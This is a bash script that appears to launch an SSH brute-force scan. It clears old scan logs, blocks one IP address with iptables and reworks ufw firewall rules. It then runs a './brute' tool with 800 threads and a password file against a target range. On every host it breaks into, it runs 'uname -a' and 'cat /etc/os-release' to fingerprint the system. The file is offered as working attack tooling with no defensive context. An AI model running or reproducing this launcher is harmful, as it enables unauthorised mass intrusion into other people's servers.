#!/bin/bash
rm -rf sparte.txt
rm -rf scan.log
iptables -A INPUT -s 188.26.174.14 -j DROP
iptables -A FORWARD -s 188.26.174.14 -j DROP
iptables -A OUTPUT -s 188.26.174.14 -j DROP
iptables-save
sudo ufw disable ;
sudo ufw allow 22 ; 
sudo ufw allow out 22 
sudo ufw default deny outgoing ;
sudo ufw default deny incoming ;
sudo ufw allow 993 ;
sudo ufw allow 6969 ;
sudo ufw allow out 53 ;
sudo ufw allow out http ;
sudo ufw allow out https ;
sudo ufw allow out 465 ;
sudo ufw allow out 587 ;
sudo ufw allow out 993 ;
sudo ufw allow out 6969 ;
sudo ufw allow 53 ;
sudo ufw allow http ;
sudo ufw allow https ;
sudo ufw allow 465 ;
sudo ufw allow 587 ;
sudo ufw allow 993 ;
sudo ufw allow 6969 ;
sudo ufw enable ;
./brute 800 -b $1 passfile $2 "uname -a ; cat /etc/os-release"
